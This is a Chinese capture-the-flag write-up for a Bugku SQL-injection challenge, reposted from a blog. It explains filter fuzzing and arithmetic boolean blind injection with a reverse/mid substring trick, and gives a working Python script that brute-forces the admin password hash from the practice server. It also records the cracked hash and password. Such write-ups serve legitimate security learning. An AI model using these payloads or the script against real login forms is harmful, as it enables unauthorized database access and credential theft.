Bugku sql注入2 writeup

转载自：http://hu3sky.ooo/2018/08/18/bugku%20sql2/

网上没有一个正常做出来了的
看了叶师傅的wp，跟着学一遍
username的注入，盲注
根据username的返回不同
fuzz，几乎都过滤完了。
没过滤的 !,!=,=,+,-,^,%
数字型时，可以用^进行闭合

and这些也被过滤。

需要用到-1-
'admin'-1-'' = -1
'admin'-0-'' = 0

我们发现-0的时候，为true，-1的时候为false
那么这是为什么呢？
我们猜想后台sql语句构造为

$sql = select * from users where username=$username;
在字符串username的值和数字0比较的时候，字符串变为了0
故此0=0

构造语句

ascii(substr((select database()),1,1))>1
很多过滤了，这个语句没法使用
用到一个倒着截取
假设：
passwd=abc123
那么我们用以下方式

1 2 3

mid((passwd)from(-1)):3 mid((passwd)from(-2)):23 mid((passwd)from(-3):123

倒着看的第一位都是3，显然不行，无法截取出来，于是想到反转
先反转
REVERSE(MID((passwd)from(-%d))
再去最后一位
mid(REVERSE(MID((passwd)from(%-d)))from(-1))
在比较ASCII
ascii(mid(REVERSE(MID((passwd)from(%-d)))from(-1)))>1

脚本

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

import requests as rq flag="" url='http://120.24.86.145:8007/web2/login.php' cookie = { 'PHPSESSID':'s1hcgs1gbudti520fvski6ih1u3kn2ko' } for i in range(1,33): for j in '0123456789abcdef': username="admin'-(ascii(mid(REVERSE(MID((passwd)from(-"+str(i)+")))from(-1)))="+str(ord(j))+")-'" data={'uname':username,'passwd':'hu3sky'} r=rq.post(url=url,data=data,cookies=cookie) if "username error!!@_@" in r.text: flag=flag+j print(flag) break

得到密码的md5值005b81fd960f61505237dbb7a3202910解码得到admin123

登录实时监控执行ls命令